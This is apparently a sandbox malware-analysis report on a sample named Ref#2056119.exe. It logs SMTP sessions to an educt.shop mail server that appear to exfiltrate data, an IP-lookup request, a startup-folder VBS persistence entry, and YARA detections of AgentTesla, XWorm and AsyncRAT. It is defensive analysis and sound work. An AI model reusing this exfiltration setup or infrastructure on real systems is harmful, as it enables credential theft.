2024-11-25 13:47:52 UTC	1369	IN	Data Raw: e7 87 08 88 71 82 18 f7 d3 a1 9f 55 7e 9d 77 19 03 fe 88 fd 66 32 c5 e8 f2 c2 70 29 f3 14 c1 74 20 70 ac 0f d6 dc 3c 38 2b 3f 36 29 52 ff 39 22 34 37 57 36 10 f9 08 3d 54 2f 3c 4d 0f 97 d5 37 2b a9 cd 4a be 9f 38 19 e1 30 6a c5 eb 10 d2 4d f3 9d 56 a9 de 13 51 01 f8 53 9d df 9c 05 7c ca 05 34 9c c1 2f b6 41 cc 57 d6 d8 55 a7 2a df 3a ed d5 f8 13 9b 71 29 95 b6 bb 4d 25 48 34 c2 02 db e0 9d c4 ac ff 75 09 71 ae 9a 66 77 69 6f d7 a5 0f df ae 06 3a da 4c 53 c8 f7 2d 94 e4 a1 f9 bf 81 e4 db 97 2e e7 6f 1b 5e a6 53 ad 6e a2 89 e4 47 61 b1 6b 7b 2b 3f f9 35 6b 5f 29 c5 5f d4 fa 86 58 39 b2 e8 a1 28 6f 11 f1 16 b6 8e 70 70 97 1f ae be e9 17 db 77 23 6a a4 16 42 2b 88 e6 a8 df c4 f3 4f 0d 26 ab 81 45 7e ba e8 2c 14 40 fd f7 0b a1 4d c1 df 6e f1 a7 38 e7 39 7b 30 Data Ascii: qU~wf2p)t p<8+?6)R9"47W6=T/<M7+J80jMVQS\|4/AWU*:q)M%H4uqfwio:LS-.o^SnGak{+?5k_)_X9(oppw#jB+O&E~,@Mn89{0
2024-11-25 13:47:52 UTC	1369	IN	Data Raw: 49 85 14 2f ca 4c 0c d2 bf 47 45 86 b6 6a 82 f2 4e 61 98 a5 80 9d 3d b2 6d 3c 23 80 34 ca 7c 66 ed 2e 35 39 4c fb fd aa 28 d9 ef 47 d0 b2 36 fa 2b 05 08 41 be fc 2f 4f 01 da b6 c4 fb 17 42 31 be 90 e4 c1 e4 e8 d8 c7 b1 4d 6a 83 f6 fc 5e 30 18 aa 68 2b 22 ba 1f e4 5e 9d 2c f2 6c 59 b9 2a 19 04 8b 13 77 2f a8 61 ff 56 21 0e c6 10 26 70 fd b9 8b ea 3b f4 06 85 3d 76 95 a7 5c f0 53 1f b5 e7 92 de c8 49 9f d2 a5 70 fa ad 6e 15 28 f9 54 e5 f2 6c b5 75 57 07 ba 28 e0 37 26 85 55 18 fa 6b eb d7 41 6a f8 95 4c ce c0 0a 1a 7e e6 d4 c7 01 72 52 cf 1f 4e 98 27 61 18 fc f6 3c 91 33 42 e6 63 de b7 f1 f1 79 2f 5d 49 0b 7b cc 8e d1 a9 42 8a 99 50 02 13 2f 56 c9 35 7e 1b 3f a7 1b 56 e8 ad 25 d8 79 3e 5e db b9 44 41 25 fb 9b d5 d4 cc 9f d0 02 c6 f6 ff f3 2c 95 d9 0a 0a 20 Data Ascii: I/LGEjNa=m<#4\|f.59L(G6+A/OB1Mj^0h+"^,lY*w/aV!&p;=v\SIpn(TluW(7&UkAjL~rRN'a<3Bcy/]I{BP/V5~?V%y>^DA%,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49750	104.26.13.205	443	4588	C:\Users\user\AppData\Roaming\ishon.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 13:48:07 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-25 13:48:08 UTC	399	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 13:48:07 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e821835cdbc5e67-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1831&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1616832&cwnd=242&unsent_bytes=0&cid=c8b0f04fb228a8eb&ts=452&x=0"
2024-11-25 13:48:08 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35 Data Ascii: 8.46.123.75

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 25, 2024 14:47:43.534679890 CET	587	49743	162.254.34.31	192.168.2.4	220 server1.educt.shop127.0.0.1 ESMTP Postfix
Nov 25, 2024 14:47:43.534954071 CET	49743	587	192.168.2.4	162.254.34.31	EHLO 888683
Nov 25, 2024 14:47:44.193017960 CET	587	49743	162.254.34.31	192.168.2.4	250-server1.educt.shop127.0.0.1 250-PIPELINING 250-SIZE 204800000 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Nov 25, 2024 14:47:44.194449902 CET	49743	587	192.168.2.4	162.254.34.31	AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
Nov 25, 2024 14:47:44.320883989 CET	587	49743	162.254.34.31	192.168.2.4	250-server1.educt.shop127.0.0.1 250-PIPELINING 250-SIZE 204800000 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Nov 25, 2024 14:47:44.609549999 CET	587	49743	162.254.34.31	192.168.2.4	334 UGFzc3dvcmQ6
Nov 25, 2024 14:47:45.047142982 CET	587	49743	162.254.34.31	192.168.2.4	235 2.7.0 Authentication successful
Nov 25, 2024 14:47:45.047409058 CET	49743	587	192.168.2.4	162.254.34.31	MAIL FROM:<sendxambro@educt.shop>
Nov 25, 2024 14:47:45.450973988 CET	587	49743	162.254.34.31	192.168.2.4	250 2.1.0 Ok
Nov 25, 2024 14:47:45.452688932 CET	49743	587	192.168.2.4	162.254.34.31	RCPT TO:<ambro@educt.shop>
Nov 25, 2024 14:47:45.865268946 CET	587	49743	162.254.34.31	192.168.2.4	250 2.1.5 Ok
Nov 25, 2024 14:47:45.865684986 CET	49743	587	192.168.2.4	162.254.34.31	DATA
Nov 25, 2024 14:47:46.266216040 CET	587	49743	162.254.34.31	192.168.2.4	354 End data with <CR><LF>.<CR><LF>
Nov 25, 2024 14:47:46.269850016 CET	49743	587	192.168.2.4	162.254.34.31	.
Nov 25, 2024 14:47:46.782505989 CET	587	49743	162.254.34.31	192.168.2.4	250 2.0.0 Ok: queued as A319276F37
Nov 25, 2024 14:48:10.597456932 CET	587	49757	162.254.34.31	192.168.2.4	220 server1.educt.shop127.0.0.1 ESMTP Postfix
Nov 25, 2024 14:48:10.600487947 CET	49757	587	192.168.2.4	162.254.34.31	EHLO 888683
Nov 25, 2024 14:48:10.998661041 CET	587	49757	162.254.34.31	192.168.2.4	250-server1.educt.shop127.0.0.1 250-PIPELINING 250-SIZE 204800000 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Nov 25, 2024 14:48:11.000181913 CET	49757	587	192.168.2.4	162.254.34.31	AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
Nov 25, 2024 14:48:11.399952888 CET	587	49757	162.254.34.31	192.168.2.4	334 UGFzc3dvcmQ6
Nov 25, 2024 14:48:11.803062916 CET	587	49757	162.254.34.31	192.168.2.4	235 2.7.0 Authentication successful
Nov 25, 2024 14:48:11.803329945 CET	49757	587	192.168.2.4	162.254.34.31	MAIL FROM:<sendxambro@educt.shop>
Nov 25, 2024 14:48:12.202763081 CET	587	49757	162.254.34.31	192.168.2.4	250 2.1.0 Ok
Nov 25, 2024 14:48:12.205069065 CET	49757	587	192.168.2.4	162.254.34.31	RCPT TO:<ambro@educt.shop>
Nov 25, 2024 14:48:12.605240107 CET	587	49757	162.254.34.31	192.168.2.4	250 2.1.5 Ok
Nov 25, 2024 14:48:12.605396986 CET	49757	587	192.168.2.4	162.254.34.31	DATA
Nov 25, 2024 14:48:13.003722906 CET	587	49757	162.254.34.31	192.168.2.4	354 End data with <CR><LF>.<CR><LF>
Nov 25, 2024 14:48:13.004515886 CET	49757	587	192.168.2.4	162.254.34.31	.
Nov 25, 2024 14:48:13.561058044 CET	587	49757	162.254.34.31	192.168.2.4	250 2.0.0 Ok: queued as 6426276FA5
Nov 25, 2024 14:49:22.141817093 CET	49743	587	192.168.2.4	162.254.34.31	QUIT
Nov 25, 2024 14:49:22.543203115 CET	587	49743	162.254.34.31	192.168.2.4	221 2.0.0 Bye

Target ID:	0
Start time:	08:47:20
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\Ref#2056119.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ref#2056119.exe"
Imagebase:	0x8e0000
File size:	545'600 bytes
MD5 hash:	2C4DB8B396DFF48BA1E6AE44BD9AAE08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2031085237.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2055273808.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:47:36
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Local\Temp\Liphmahu.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Liphmahu.exe"
Imagebase:	0x170000
File size:	545'600 bytes
MD5 hash:	225F257617CD3A58DB6D4CCC447F48E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2215628448.0000000006890000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:47:37
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\Ref#2056119.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ref#2056119.exe"
Imagebase:	0xad0000
File size:	545'600 bytes
MD5 hash:	2C4DB8B396DFF48BA1E6AE44BD9AAE08
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3115674716.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3115674716.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3115674716.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3115674716.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3115674716.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:47:47
Start date:	25/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs"
Imagebase:	0x7ff753bb0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:47:48
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Roaming\ishon.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ishon.exe"
Imagebase:	0xd70000
File size:	545'600 bytes
MD5 hash:	2C4DB8B396DFF48BA1E6AE44BD9AAE08
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2307141750.0000000003120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:47:53
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Local\Temp\Liphmahu.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Liphmahu.exe"
Imagebase:	0x900000
File size:	545'600 bytes
MD5 hash:	225F257617CD3A58DB6D4CCC447F48E9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	08:47:56
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 932
Imagebase:	0x580000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:48:04
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Roaming\ishon.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ishon.exe"
Imagebase:	0xaf0000
File size:	545'600 bytes
MD5 hash:	2C4DB8B396DFF48BA1E6AE44BD9AAE08
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3116067900.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3116067900.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3116067900.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3116067900.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3116067900.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.5%
Total number of Nodes:	391
Total number of Limit Nodes:	18

Executed Functions

Function 07430040 Relevance: 16.1, Strings: 12, Instructions: 1102COMMON

Download Yara Rule

Strings

$kq, xrefs: 07430921
$kq, xrefs: 07430537
$kq, xrefs: 0743097A
$kq, xrefs: 07430497
,oq, xrefs: 07430AFA
$kq, xrefs: 0743096A
4, xrefs: 07430A15
$kq, xrefs: 074302D3
$kq, xrefs: 07430911
$kq, xrefs: 074302C3
$kq, xrefs: 07430487
$kq, xrefs: 07430547

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: ,oq$4$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1127353760
Opcode ID: b3e298a849d183d695d50a42d0c89ca43c148ecda4c08dcc694ccfcfff0adde6
Instruction ID: 553a00cef6543f03c6d16f9b343216137d3fa555d1bae93fc8f5df14b14fdbe4
Opcode Fuzzy Hash: b3e298a849d183d695d50a42d0c89ca43c148ecda4c08dcc694ccfcfff0adde6
Instruction Fuzzy Hash: E4B20BB4A00219CFDB14DF99C994BAEB7B6BF48300F15819AE509AB3A5DB70DD81CF50

Function 07430367 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$kq, xrefs: 07430537
,oq, xrefs: 07430AFA
$kq, xrefs: 0743096A
4, xrefs: 07430A15
$kq, xrefs: 07430911
$kq, xrefs: 07430487

Memory Dump Source

Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd

Similarity

API ID:
String ID: ,oq$4$$kq$$kq$$kq$$kq
API String ID: 0-569362799
Opcode ID: 52b0c428fc591e34ebf065d569ccfaf5fd5784b64f041d1c1296a386c085beac
Instruction ID: a103a01417787372c9e5f05395069fec2020a38d3a6e0caa693cf4b8b263723f
Opcode Fuzzy Hash: 52b0c428fc591e34ebf065d569ccfaf5fd5784b64f041d1c1296a386c085beac
Instruction Fuzzy Hash: CE22CAB4A00219CFDB24DF65C994BADB7B6FF48300F1582AAD509AB3A5DB709D81CF50

Function 07173798 Relevance: 7.2, Strings: 5, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tekq, xrefs: 07173EBB
TJpq, xrefs: 0717393A
BE, xrefs: 07173B6B
xbnq, xrefs: 071738C5
poq, xrefs: 07174352

Memory Dump Source

Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd

Similarity

API ID:
String ID: TJpq$Tekq$poq$xbnq$BE
API String ID: 0-2293240419
Opcode ID: 5a3c70929e1cd2495c850dd8875cb748fd0120a3bb11b1404a5d528341ce592b
Instruction ID: 88676bfd7f8646b1f4d7caeb29de6629e1fe89edab5b006d52aefbd277084d9a
Opcode Fuzzy Hash: 5a3c70929e1cd2495c850dd8875cb748fd0120a3bb11b1404a5d528341ce592b
Instruction Fuzzy Hash: C5A2B875A00228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB365DB319E81CF40

Function 07174E48 Relevance: 3.9, Strings: 2, Instructions: 1369
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 071754DA
2, xrefs: 07175E56

Memory Dump Source

Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd

Similarity

API ID:
String ID: 2$$kq
API String ID: 0-2649369545
Opcode ID: 0130f1dd3d723af7d12db1f555e7e0cffa49d0bbace0acf9a28f7070002383ca
Instruction ID: 3c13a30258df1ff362f0c13dff1f9b6c792e5ae4379e384d56303ee210479289
Opcode Fuzzy Hash: 0130f1dd3d723af7d12db1f555e7e0cffa49d0bbace0acf9a28f7070002383ca
Instruction Fuzzy Hash: E7E2F6B8E052288FCB65DF69D9946D9BBF2FB89304F1082E9D409A7354DB349E81CF50

Function 074BB0F0 Relevance: 3.1, Strings: 2, Instructions: 611
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 074BB1E4
fpq, xrefs: 074BB1F7

Memory Dump Source

Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd

Similarity

API ID:
String ID: fpq$8
API String ID: 0-1207623099
Opcode ID: 4531011ee53e05f504b15b3c9d9ca4b6ad3dc7d4cd514fdddda23cab6acbdcfa
Instruction ID: 3892fad3e102586863d81e8d6502be5edd6b6d9aa0c06ff282606bc76b254ceb
Opcode Fuzzy Hash: 4531011ee53e05f504b15b3c9d9ca4b6ad3dc7d4cd514fdddda23cab6acbdcfa
Instruction Fuzzy Hash: F852B7B5D01629CFDB64DF69C890AD9B7B1FF89310F1086AAD809A7354DB316E81CF50

Function 074BB0E0 Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

fpq, xrefs: 074BB1F7
h, xrefs: 074BB1D8

Memory Dump Source

Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd

Similarity

API ID:
String ID: fpq$h
API String ID: 0-747736143
Opcode ID: c15fa563c7032e163df38448894f2092e1158851313caf507530e15f1142131c
Instruction ID: 05ca4e972054d4ec821afd90c4a0fb1486560197c5fddb522ce3a6a59bfc90a9
Opcode Fuzzy Hash: c15fa563c7032e163df38448894f2092e1158851313caf507530e15f1142131c
Instruction Fuzzy Hash: 617109B5D016288BDB64DF69C850AD9B7B2FF89300F5082AAD40DB7254DB305E85CF61

Function 0714B9C8 Relevance: 1.7, Strings: 1, Instructions: 427COMMON

Download Yara Rule

Strings

Tekq, xrefs: 0714BCFE

Memory Dump Source

Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: 9111021a858a7c4ba1cf24054b306c15850e42609542a1eb0e120010648e0978
Instruction ID: e83dd9327c0bfad063cde9c8defcc8c7084de07087c9467827fc0548ce7d9ff1
Opcode Fuzzy Hash: 9111021a858a7c4ba1cf24054b306c15850e42609542a1eb0e120010648e0978
Instruction Fuzzy Hash: 8D120AB4A09228CFDB68DF69C894B99B7F2FB89304F5081A9D40DA7394DB749D81CF50

Function 071559B0 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

PHkq, xrefs: 07155D40

Memory Dump Source

Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd

Similarity

API ID:
String ID: PHkq
API String ID: 0-902561536
Opcode ID: 23ba8220b970a0da4195461c5fd403deb73657b4f83f47265e6392b97804d9f2
Instruction ID: befb58f803a918394809c7caba4ea73a3f8d19fa9a6b10b664cbaa6c2b4c223b
Opcode Fuzzy Hash: 23ba8220b970a0da4195461c5fd403deb73657b4f83f47265e6392b97804d9f2
Instruction Fuzzy Hash: 83D106B4E04218CFDB28CFA9C484B9DB7F3FB8A304F5181A9D819A7294DB745995CF01

Function 071559A0 Relevance: 1.6, Strings: 1, Instructions: 309COMMON

Download Yara Rule

Strings

PHkq, xrefs: 07155D40

Memory Dump Source

Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd

Similarity

API ID:
String ID: PHkq
API String ID: 0-902561536
Opcode ID: 340b6ef77ea28bfd295d9cd192f01b274dfc1be0cad7f3ca2eedc3484aceabab
Instruction ID: 6888ffe0313ff03d47d6eef11e9a7752126b829ab7b2dc85c44f1974207b29d6
Opcode Fuzzy Hash: 340b6ef77ea28bfd295d9cd192f01b274dfc1be0cad7f3ca2eedc3484aceabab
Instruction Fuzzy Hash: 98D106B4E04218CFDB68CFA9D484B9DBBF3FB89304F5081AAD819A7294DB745985CF41

Function 0715F002 Relevance: 1.6, APIs: 1, Instructions: 58nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0715F076

Memory Dump Source

Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c89aeacca34b37235534cb2cff7cacfa04d74abe6500642ff825e93d68849ce4
Instruction ID: ac3974a0d3554ef5d149ee68b0c4be0fdf25c64f499924b90eb057d1f6543464
Opcode Fuzzy Hash: c89aeacca34b37235534cb2cff7cacfa04d74abe6500642ff825e93d68849ce4
Instruction Fuzzy Hash: EC1124B19002499ACB20DFAAC844B9FFFF8AF48220F14842AD459A7250CB75A945CFA4

Function 0715F008 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0715F076

Memory Dump Source

Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d72c5938cd96ceabf4cdbe66ce6a4de7cc092fc3300a65155353b132afdbcb29
Instruction ID: cfcee3ae651c462b3ef44b14fe2f50e1a5348744c367b0470916897fd8d60c8f
Opcode Fuzzy Hash: d72c5938cd96ceabf4cdbe66ce6a4de7cc092fc3300a65155353b132afdbcb29
Instruction Fuzzy Hash: 381114B1D002098FDB14DFAAC584B9FFBF8EF88320F14842AD459A7250CB74A944CFA4

Function 071435D8 Relevance: 1.5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

Strings

Tekq, xrefs: 07143738

Memory Dump Source

Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: 28d4ea3a90de9b4606016321393652118985273718cca89cee63008aeeeca032
Instruction ID: 69bd3813a6bfaef06997336eea5cd7a2e9776e9053498f41117450e4c7e75a80
Opcode Fuzzy Hash: 28d4ea3a90de9b4606016321393652118985273718cca89cee63008aeeeca032
Instruction Fuzzy Hash: F0B1F4B4E01219CFDB18CFA9D985B9DBBF2BB4A304F2181A9D419B7395DB709985CF00

Function 071435E8 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

Tekq, xrefs: 07143738

Memory Dump Source

Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

